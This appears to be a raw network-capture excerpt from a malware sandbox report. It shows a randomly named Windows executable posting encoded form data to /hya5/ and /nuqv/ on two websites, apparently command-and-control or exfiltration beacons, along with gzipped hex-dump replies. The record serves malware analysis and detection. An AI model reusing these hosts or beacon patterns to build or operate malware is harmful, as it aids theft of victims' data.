                                                                                                                  Oct 8, 2024 15:40:40.828442097 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:40 GMT
                                                                                                                  Server: Apache
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Content-Encoding: gzip
                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                  X-Newfold-Cache-Level: 2
                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                  X-nginx-cache: WordPress
                                                                                                                  Content-Length: 12947
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
                                                                                                                  Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                  Oct 8, 2024 15:40:40.828493118 CEST224INData Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                  Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)
                                                                                                                  Oct 8, 2024 15:40:40.828504086 CEST1236INData Raw: 57 5f 19 10 11 e1 d2 58 26 83 da 92 6f 5d 9e 7f 89 22 13 68 00 f9 5d 11 d4 e6 a0 db 6d f7 46 dd 96 cf 3d 3c 66 16 7e 10 90 82 b4 cd 46 99 e4 46 ab cd 26 da 05 ff 3b 25 2d 5c e2 45 3f 6c b4 97 73 2e c4 6f c0 c2 1f 35 fc 33 c7 7a b1 f0 df 74 af 5a
                                                                                                                  Data Ascii: W_X&o]"h]mF=<f~FF&;%-\E?ls.o53ztZm5i2EHz*ka1v]jV9,?0J&OkbpuN#;Egt0AA=M{,@%\MWRnP4w`-yg4fg#,FT'K^
                                                                                                                  Oct 8, 2024 15:40:40.828557968 CEST1236INData Raw: 7c 9a 22 1b 2e 7d af 8b f4 88 87 3b 90 2e e9 9e 16 5e 58 cd a4 89 10 c6 cf b3 0c 74 c0 0c 5c 4d 55 b8 f0 b4 15 e4 b3 b8 4a 25 a1 9a 54 64 c4 77 83 ae b2 1b 18 c5 c7 94 05 17 b1 56 b9 0c 97 0a bd c5 ee b9 9f f0 30 04 79 e5 6b a5 2c a9 fc df ae 6e
                                                                                                                  Data Ascii: |".};.^Xt\MUJ%TdwV0yk,n-3WMF}U(Z--UvW7"}Fwtj>^p!hGogtyFid,p\h"w\z:X=*x[>Lsk\n.OJt]T[swg=1
                                                                                                                  Oct 8, 2024 15:40:40.828569889 CEST1236INData Raw: a6 2f 30 85 bd ae 83 1b 4f 59 6f 6f e1 1a b8 7b d4 ee 8d f7 d5 f7 0b e0 11 3b 3e da 5b b8 02 3e 41 ec c1 68 b3 bc 8c 08 2d 5c a5 91 0a 72 e3 f7 b3 cb b2 a2 54 cf 2c 64 00 e1 4a 98 23 d6 ed 86 d1 ae fb 72 4e af df 6f 77 db fd fe a0 2a 73 7e 56 c5
                                                                                                                  Data Ascii: /0OYoo{;>[>Ah-\rT,dJ#rNow*s~V%rFDn~f[=o]^]yXNsk\6H S\ZW`4a`)B`Rt+J!V/ab84lA]>-g=],{QZg<JIN
                                                                                                                  Oct 8, 2024 15:40:40.828583002 CEST672INData Raw: 75 89 b6 c8 70 4a 51 0d ac 40 3b 34 a6 53 2f 7c b2 8e 06 75 52 80 dd ae 68 9d ee 83 32 80 0a 87 77 83 ad 6b 10 ee 0b fc b7 05 e1 16 bd a3 7b ca 0c d4 f0 b8 81 94 d5 f5 9b 8c 05 5c c6 94 0e bb 75 fd bb 16 b3 70 e9 9a d3 3a c8 08 d3 44 0d ff 04 94
                                                                                                                  Data Ascii: upJQ@;4S/|uRh2wk{\up:D^bR{r)T4mBxoI1t%mv0)vbm[5!mLUJ!P2q]cBY$<BM\.Z)9K5\L
                                                                                                                  Oct 8, 2024 15:40:40.828772068 CEST1236INData Raw: dd 6b 19 dc e1 a8 dd eb 56 87 9f 45 a5 1c 79 ad 86 86 70 df fc 8d 51 95 0e fd ee 51 7b 38 c6 ff f7 0d 9f 01 26 66 65 05 5b b8 b1 ab 34 70 93 14 67 77 9a d0 1f 1c b7 ab bf eb 0c 8c 4f 50 90 61 bb 77 32 da 37 3e 50 4a b8 99 73 a6 53 6a 32 08 ac ce
                                                                                                                  Data Ascii: kVEypQQ{8&fe[4pgwOPaw27>PJsSj2;q^wHSgJ0\!xuQ>^P&T/u&JaU;6U:_+Z:x6-2ZGqssq^Ie>_O@UL;,f
                                                                                                                  Oct 8, 2024 15:40:40.828783035 CEST1236INData Raw: 4f a9 84 98 59 3e 03 9a 28 cd 3f 29 69 99 a0 29 d3 31 97 3e c1 88 76 6f 4d e0 32 cb ed 8a 08 62 28 ed ef 76 bc b6 69 ce 43 9b f8 a4 bf 03 3a e5 92 26 c0 e3 c4 62 8d 37 42 e2 37 ab 0c 2e 26 80 66 ca 58 1a 01 b3 b9 06 ca 53 16 03 55 7a 06 5a b0 8c
                                                                                                                  Data Ascii: OY>(?)i)1>voM2b(viC:&b7B7.&fXSUzZ`s&E=mbPu+`edIJDcBMq,'-H}>]sD`Uv\ByS.Z8aj<0\rN<&x,DL$CqiGu%8n((>n@F-+Pf
                                                                                                                  Oct 8, 2024 15:40:40.828795910 CEST1236INData Raw: 87 3e 5b 8e ba d6 3b 27 7c b6 28 75 ad 35 13 a6 02 e7 df e6 bf 7d 70 c7 a0 02 a1 06 39 58 30 89 97 39 37 09 8d 35 ab 11 e9 33 86 6c 83 d5 cc 9b 27 dc c2 a3 86 14 08 35 c8 19 13 40 33 2e 1f a7 d3 1a a5 66 c2 8c cf 78 48 35 84 8f 9a b0 46 a9 99 20
                                                                                                                  Data Ascii: >[;'|(u5}p9X09753l'5@3.fxH5F KF)d8jOfS.8Y13vzDv$YyjnO3lk,xQ%P)3w5V3cs^,/1jkO73tvO0O1Do$
                                                                                                                  Oct 8, 2024 15:40:40.829006910 CEST1236INData Raw: 5b d8 4c 8a ab 98 f3 d0 0d 5f 81 ce 91 3d 9d 6b 96 39 c9 74 ca c4 56 fd d5 5e 15 fc 48 05 b9 a9 b4 60 c1 45 ac 55 2e 43 5a 59 f7 16 00 36 84 61 b9 55 db 8c 36 24 29 5c 2b ce aa ee e1 70 58 7c 87 dc b8 bc f9 a4 70 ae 38 2a c2 68 f8 27 c0 65 20 bd
                                                                                                                  Data Ascii: [L_=k9tV^H`EU.CZY6aU6$)\+pX|p8*h'e !RsTZX)a+I?aSFe0I!\"d+C"&IaNmFh&XHUtbL093F[xCBqH:fjPJQEn
                                                                                                                  Oct 8, 2024 15:40:40.835489988 CEST1236INData Raw: d7 84 5e 78 e7 57 34 7a 63 e7 67 b6 fb 1f b9 e4 56 ed b1 ba ff 42 6b 97 64 5e 70 d7 1a 8b 5f 78 d7 67 b6 f7 9d 12 73 b6 d8 63 ef e0 05 d6 35 05 11 3a eb 8d a8 60 96 4b 8a 43 bd b9 8a a2 fe c6 96 d5 f7 23 d7 19 be c6 3a 1a e2 5c 30 fd 4c 2b 8d 5e
                                                                                                                  Data Ascii: ^xW4zcgVBkd^p_xgsc5:`KC#:\0L+^c9t=:Ci|03/TPJ.v\-!OL_cv{ry!jDQ)L+:-]+x+W]t^/Uu|)3%N~#_}U=z/_}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.550018162.241.244.106804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:42.603425980 CEST1764OUTPOST /hya5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.mommymode.site
                                                                                                                  Origin: http://www.mommymode.site
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.mommymode.site/hya5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 47 69 47 6a 64 37 63 52 49 5a 59 43 6b 65 64 36 45 79 30 76 43 58 38 45 30 71 37 32 50 58 48 4c 53 2b 71 73 65 76 63 72 31 5a 31 4f 70 70 75 6e 45 5a 61 57 2b 73 69 7a 43 65 4e 78 55 46 49 6f 58 51 52 32 39 51 50 63 56 33 69 66 4f 31 36 66 53 49 5a 59 51 64 69 33 70 63 57 77 78 74 56 6b 5a 68 47 31 30 75 34 71 7a 4d 55 65 77 52 62 42 39 34 4d 4a 45 38 57 50 50 61 49 7a 59 69 39 55 72 55 69 53 38 62 46 2b 51 47 69 59 79 66 79 75 74 72 31 30 67 4a 7a 41 4f 63 6a 72 72 37 5a 42 7a 76 70 48 63 44 69 41 59 77 30 48 6f 42 76 35 7a 70 71 58 57 4c 57 39 48 31 75 49 38 2f 75 54 53 4e 70 74 31 66 6e 46 4c 66 59 4b 76 35 62 65 39 57 55 66 42 4b 6d 46 45 58 51 72 72 75 6a 6e 69 33 2b 44 31 68 63 56 7a 59 2f 6c 56 45 37 44 66 47 68 51 66 48 5a 72 6b 76 78 7a 30 69 6b 36 35 6a 61 4f 36 6d 54 48 5a 5a 69 62 61 34 5a 7a 57 62 49 51 57 65 62 6b 75 44 38 72 65 6c 4f 69 41 2b 4b 41 61 54 53 5a 64 61 6f 4e 78 68 43 2b 7a 63 52 79 65 50 75 35 79 53 79 56 4f 75 71 53 7a 49 7a [TRUNCATED]
                                                                                                                  Data Ascii: nV=pDgGeDs8Yl7nGiGjd7cRIZYCked6Ey0vCX8E0q72PXHLS+qsevcr1Z1OppunEZaW+sizCeNxUFIoXQR29QPcV3ifO16fSIZYQdi3pcWwxtVkZhG10u4qzMUewRbB94MJE8WPPaIzYi9UrUiS8bF+QGiYyfyutr10gJzAOcjrr7ZBzvpHcDiAYw0HoBv5zpqXWLW9H1uI8/uTSNpt1fnFLfYKv5be9WUfBKmFEXQrrujni3+D1hcVzY/lVE7DfGhQfHZrkvxz0ik65jaO6mTHZZiba4ZzWbIQWebkuD8relOiA+KAaTSZdaoNxhC+zcRyePu5ySyVOuqSzIzikWmKWRev0Mgpqo18d2TgP/CJrzqO3qfwEbJ2BQZgthZtOmW+YC85gmyBungvTj9XK+Id/dv/BOTnscDi9MwKLRFJikRu4JbeLnL2dpLHyEUs1s7q7cjNqacGXEVBvhd1NvKJao6zCEh5slSzAQWe7sITLa3qUz0nXzDZ1ecrDm3FlRm4qygxMwAyPCCjIBek6aonEq1KRjLKw9/qK3t85IoGb3bmDN3tS3xb9EF8iom34qO1FYYFNt45vFHfFa/C+8uM0heI7Ol5cQs1MK9PmX9tVVG6Wrqw9KhjXlW6DXl9zIIpe6LJTMQgaKPQXyypr0A4iIACl1dcz7IiEocZsDK5iiZPQnlvE51fkq3EWEYtU7xovaYD7RXzJVhO0LqVtNgiLNUQf9/3oemgbbGOiyMWzshI6WYD+t4m8EXh2apZ2cZJcUxRP6dFo8LhiPPtGXiy3n2kb5n6qqZnPQN4t3cO1c3jmxJuM8Wz1i9exag0Ddc3f3HkuIFxk2qnBK4tKPOwL2wsq2AopYt+zqNU8eEcONcA66j6UashoIy4ELv0gTitNFxY8fBXucKSnvWkD0HkWITaJqL3oxf3/O7YMeUbQ9fI9xouEu2s1O0KKYTCjbbOHojntiRtm/lOaB+bLB0Uo50F9WKY43HVSDQyhLwaTBmU+NQQf [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:40:43.543582916 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:43 GMT
                                                                                                                  Server: Apache
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Content-Encoding: gzip
                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                  X-Newfold-Cache-Level: 2
                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                  X-nginx-cache: WordPress
                                                                                                                  Content-Length: 12947
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
                                                                                                                  Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                  Oct 8, 2024 15:40:43.543610096 CEST1236INData Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                  Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)W_X&o]"
                                                                                                                  Oct 8, 2024 15:40:43.543629885 CEST1236INData Raw: 4d 55 08 7f 55 8e ac ee 30 94 96 07 4c 50 a1 ff 6a b5 6f e3 68 1e 27 9f 07 a4 85 03 ea 3f 11 a1 5b 38 0f 25 34 78 22 42 b7 70 1e 4a 68 f8 44 84 6e e1 3c 94 d0 e8 89 08 dd c2 79 28 a1 f1 13 11 ba 85 f3 30 42 4b ad 2c b3 e0 f7 8e bb 21 c4 57 07 67
                                                                                                                  Data Ascii: MUU0LPjoh'?[8%4x"BpJhDn<y(0BK,!WgxN\ik%K%jR&DAg)iF^{q.Uxe6ou!*|lTqm,k-e$BZ}m]~=-vMoo||".};.^X
                                                                                                                  Oct 8, 2024 15:40:43.543706894 CEST672INData Raw: c4 da cc ef 74 52 95 a6 8b 54 85 e0 e1 a6 d0 41 7e 28 80 c5 ac 77 8a 2d 4c 67 03 b6 c3 8c 01 6b 3a 88 d2 d9 31 c1 4b b9 f4 f0 fe db 19 e8 49 cf eb 7a dd 43 92 42 c8 d9 e4 90 09 71 48 3a db ba 41 aa 3e 72 5a ee 72 53 b2 83 2f 78 1a 3b c1 4c ca 05
                                                                                                                  Data Ascii: tRTA~(w-Lgk:1KIzCBqH:A>rZrS/x;L,}dy!7Ziem<"U$a^'eIy3M.Rc.}%kv)eq'O5,jRb!U5PBim{Li5:v?lB/0OYoo{
                                                                                                                  Oct 8, 2024 15:40:43.543725967 CEST1236INData Raw: d2 29 13 b5 75 33 a6 9b 94 ce 33 4a 33 0d 06 2c bd ae a2 55 5f c5 28 c9 63 f8 7c 08 d7 55 01 58 b8 b4 94 09 1e 4b 1a e0 fe a0 97 d7 27 7e 79 72 ab 50 40 64 37 cb dc f7 ad 22 ed d4 df ac 2a 0e ae de 82 0c 51 47 e4 c1 a6 02 28 84 dc 2a 4d 0d 04 96
                                                                                                                  Data Ascii: )u33J3,U_(c|UXK'~yrP@d7"*QG(*M+[RIU &lrqscy!,G.Lvjrz@q{@%a!*~4<5jeVqE3fK9~:M14rSf#~id
                                                                                                                  Oct 8, 2024 15:40:43.543745041 CEST1236INData Raw: 9e 4c 47 3d d8 b1 e3 94 99 7d ee 05 4a 5a cd 8c dd 93 9b 4c f3 94 69 17 97 7f 1f 8f 7e 18 1f d7 57 19 40 b8 b0 ac 83 68 30 38 ee d5 d7 59 d0 96 97 65 6c d8 ed 0e 77 88 98 00 0b 41 e3 16 c1 45 ac 55 2e 5d 72 7e f8 fe 87 de 0f 3b 60 ab fa 48 69 58
                                                                                                                  Data Ascii: LG=}JZLi~W@h08YelwAEU.]r~;`HiXTUo`\`tFf!ioZ^w4{Qq[S{vHKwF[~9Z8~tz|{yM5S>WxQ9kVEyp
                                                                                                                  Oct 8, 2024 15:40:43.543761015 CEST1236INData Raw: fe b8 9c d6 f7 86 c3 62 da e8 ae 51 c7 6b 9c a1 37 38 de c4 19 0f 4b 1c 7c 1b 17 38 e3 92 d1 4e a8 de 86 c3 c3 e1 a6 c3 83 f1 2d 87 c7 b5 02 24 2c 54 73 4a 25 b3 b9 66 c2 27 e3 ec b2 f8 3b c1 3f 1d 4f 59 b3 8b bd e5 ff 5e 7f 57 77 08 90 f9 a4 d7
                                                                                                                  Data Ascii: bQk78K|8N-$,TsJ%f';?OY^Wwg'r+f;0hsV7gvM47w[w*t@/k6_?akH/6z^5zqminttjd]e,]7t4P"OY>(?)i)1
                                                                                                                  Oct 8, 2024 15:40:43.543781042 CEST1236INData Raw: 27 c3 d5 b6 c8 1b 9e 66 4a 5b 26 6d 85 11 2c 98 c4 cb 9c 9b 84 c6 9a 2d ee 09 b7 dd 56 83 3c 4f 30 b3 f7 84 2b 6a 6b 30 32 26 80 66 a8 e9 3d 71 d6 f5 35 58 33 3e e3 21 d5 10 de 13 6b 5d 5f 83 25 f2 94 4b 95 af 40 95 66 32 be ef ae b5 bd fb 67 b0
                                                                                                                  Data Ascii: 'fJ[&m,-V<O0+jk02&f=q5X3>!k]_%K@f2gta#<N, KCSFnU+|?vk'nL|hR8eH!Pjf=QVu^h2eui]_eA[~UyR,*Vyo7v4<o7V<N>[;'|(u5
                                                                                                                  Oct 8, 2024 15:40:43.544075012 CEST1236INData Raw: c3 73 5d 74 df 44 3d f0 b5 52 96 f8 73 cc 20 34 3d 6c 9d 0a 15 5c d0 04 58 c8 65 dc 5a 06 4a 28 5d 87 5c 5c b8 4f 9e 32 bd 68 9d 3e 48 b7 53 0b 97 96 86 10 28 8d 99 52 d2 27 52 49 d8 4b 8b b0 ea c6 97 ca 16 d7 20 20 05 9c 30 cd ad 55 b2 d5 fa 0c
                                                                                                                  Data Ascii: s]tD=Rs 4=l\XeZJ(]\\O2h>HS(R'RIK 0U(u]8?8+5).aQz1_|<hI5Pd_LtOW xm_k}O3fp4G/xX`i755Idq)K([L_=k9
                                                                                                                  Oct 8, 2024 15:40:43.544112921 CEST1236INData Raw: c6 43 ec e2 cc b9 77 88 42 46 c8 c4 50 a1 02 26 0e cf 0f fe cd 7d d2 88 05 b0 ac de 52 2e 16 fe cf b9 e0 26 39 2d 8e 8a 6e 5f 2a 9d 32 51 9e cc 81 c7 89 f5 fb dd 2e 39 e9 76 cb b3 90 9b 4c b0 85 1f 21 c5 29 0b 2e 4e 31 97 3e c6 b9 79 b8 37 9b 36
                                                                                                                  Data Ascii: CwBFP&}R.&9-n_*2Q.9vL!).N1>y76LgmBJW,vJ2?l*G<0GaDmZak[- ?m9[B;Wl^r_zg*;Jm]iM^xW4zcgV
                                                                                                                  Oct 8, 2024 15:40:43.548846006 CEST1236INData Raw: a0 7f 2f 32 ee 34 c9 63 a0 eb e1 b7 f9 9d ff a2 54 66 da 24 63 31 10 a9 2c c6 2f 97 a1 b7 9e 91 dd 39 a2 71 fe 4e 69 bd 68 13 cc 86 8b 1a d1 f0 cf 1c 8c 45 7f 0a 40 6e 36 30 c9 7f ab 9c a4 ce 01 62 f5 82 30 62 80 e9 20 21 53 10 6a 8e 13 b3 62 e0
                                                                                                                  Data Ascii: /24cTf$c1,/9qNihE@n60b0b !Sjb)X9AR',bL%ftR"U!x.Ub7d]sL!-$ocEU@H7Us]qr)iw-BeDbs'G/QmE*hRn1i4


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.550019162.241.244.106804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:45.147373915 CEST472OUTGET /hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ== HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.mommymode.site
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:40:45.911300898 CEST630INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:45 GMT
                                                                                                                  Server: nginx/1.25.5
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 0
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  X-Redirect-By: WordPress
                                                                                                                  Location: http://mommymode.site/hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ==
                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                  X-Newfold-Cache-Level: 2
                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                  X-nginx-cache: WordPress
                                                                                                                  X-Server-Cache: true
                                                                                                                  X-Proxy-Cache: MISS


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.550020199.59.243.227804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:56.054073095 CEST733OUTPOST /nuqv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.polarmuseum.info
                                                                                                                  Origin: http://www.polarmuseum.info
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.polarmuseum.info/nuqv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 52 6f 35 59 65 74 71 48 6c 6d 6b 38 42 4c 44 47 4f 2b 4d 77 69 43 2b 52 57 52 2b 6e 4b 54 54 77 6d 38 47 32 55 57 54 71 47 72 43 56 4e 4a 41 6e 36 68 45 4a 66 4d 55 44 42 6d 2f 34 51 6a 35 36 31 43 68 79 64 6c 75 39 4d 64 36 7a 4a 53 4d 55 55 75 36 48 76 43 4c 66 4c 4f 33 39 73 43 6a 4a 30 52 52 5a 41 4a 30 72 46 41 31 55 70 2b 38 4f 65 77 64 55 6f 64 54 73 52 68 45 2f 54 65 76 65 76 6e 49 42 6f 72 44 49 78 76 6e 35 7a 2b 6b 52 46 7a 73 69 7a 32 4f 72 70 6c 56 75 47 33 6c 41 51 38 73 70 48 53 74 45 34 31 41 6e 78 6a 66 70 77 66 32 7a 77 74 50 34 68 51 78 55 73 43 41 63 42 4c 68 5a 56 6f 77 3d
                                                                                                                  Data Ascii: nV=Ro5YetqHlmk8BLDGO+MwiC+RWR+nKTTwm8G2UWTqGrCVNJAn6hEJfMUDBm/4Qj561Chydlu9Md6zJSMUUu6HvCLfLO39sCjJ0RRZAJ0rFA1Up+8OewdUodTsRhE/TevevnIBorDIxvn5z+kRFzsiz2OrplVuG3lAQ8spHStE41Anxjfpwf2zwtP4hQxUsCAcBLhZVow=
                                                                                                                  Oct 8, 2024 15:40:56.509367943 CEST1236INHTTP/1.1 200 OK
                                                                                                                  date: Tue, 08 Oct 2024 13:40:56 GMT
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  content-length: 1130
